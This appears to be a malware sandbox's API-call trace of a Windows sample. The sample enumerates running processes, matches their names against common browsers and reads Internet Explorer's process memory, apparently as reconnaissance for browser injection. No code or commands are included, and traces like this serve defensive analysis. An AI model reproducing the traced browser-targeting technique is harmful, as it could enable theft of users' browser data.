	[0214.236] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.236] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0214.236] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.236] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.237] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0214.237] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x42ec
	[0214.237] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.237] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0214.238] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.238] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.238] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.238] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0214.238] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.238] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.238] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0214.239] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x42f0
	[0214.240] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.240] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0214.240] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.240] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.241] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.241] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0214.241] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.241] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.241] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0214.242] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0214.242] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0214.243] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x42f4
	[0214.243] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.243] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0214.243] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.243] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.244] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.244] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0214.245] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.245] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.245] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0214.246] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x42f8
	[0214.246] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.246] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0214.246] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.246] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.247] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.247] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0214.247] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.247] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.247] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0214.248] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x42fc
	[0214.248] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.248] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0214.248] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.248] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.249] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.249] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0214.249] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.249] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.249] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0214.250] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x4300
	[0214.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.250] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0214.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.250] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.251] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.251] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0214.251] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.251] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.252] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0214.252] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x4304
	[0214.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.252] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0214.253] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.253] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.253] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.254] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0214.254] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.254] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.254] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0214.255] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x4308
	[0214.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.255] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0214.256] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.256] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.256] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.256] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0214.256] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.256] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.256] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0214.257] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x430c
	[0214.257] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.257] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0214.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.258] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.258] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0214.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.258] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.259] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0214.260] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x4310
	[0214.260] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.260] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0214.260] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.260] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.261] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0214.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.261] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.261] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0214.262] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x4314
	[0214.262] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.262] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0214.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.263] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.263] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0214.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.263] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.263] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0214.264] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x4318
	[0214.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.264] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0214.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.264] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.265] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0214.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.265] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.265] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0214.266] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x431c
	[0214.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.266] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0214.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.267] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.268] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0214.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.268] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.269] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0214.269] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x4320
	[0214.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.269] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0214.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.270] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.271] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0214.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.271] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.272] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0214.272] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x4324
	[0214.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.273] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0214.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.273] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.274] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0214.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.274] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.274] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0214.275] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x4328
	[0214.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.275] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0214.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.276] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.277] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0214.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.277] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.278] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0214.279] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x432c
	[0214.279] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.279] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0214.279] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.279] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.280] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0214.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.280] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.281] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0214.281] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x4330
	[0214.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.282] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0214.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.282] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0214.283] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.283] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0214.283] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.283] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.283] NtQueryInformationProcess (in: ProcessHandle=0x4330, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0214.283] ReadProcessMemory (in: hProcess=0x4330, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0214.283] ReadProcessMemory (in: hProcess=0x4330, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0214.283] ReadProcessMemory (in: hProcess=0x4330, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0214.284] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0214.284] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0214.284] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x4334
	[0214.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.285] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0214.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.285] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0214.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.285] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0214.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.285] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.286] NtQueryInformationProcess (in: ProcessHandle=0x4334, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0214.286] ReadProcessMemory (in: hProcess=0x4334, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0214.286] ReadProcessMemory (in: hProcess=0x4334, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0214.286] ReadProcessMemory (in: hProcess=0x4334, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0214.286] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0214.286] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0214.287] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x4338
	[0214.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.287] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0214.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.287] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.288] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0214.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.288] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.288] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0214.289] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x433c
	[0214.289] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.289] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0214.289] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.289] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.290] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0214.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.290] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0214.290] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0214.291] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x4340
	[0214.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.291] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0214.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.292] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0214.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.292] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0214.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0214.292] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
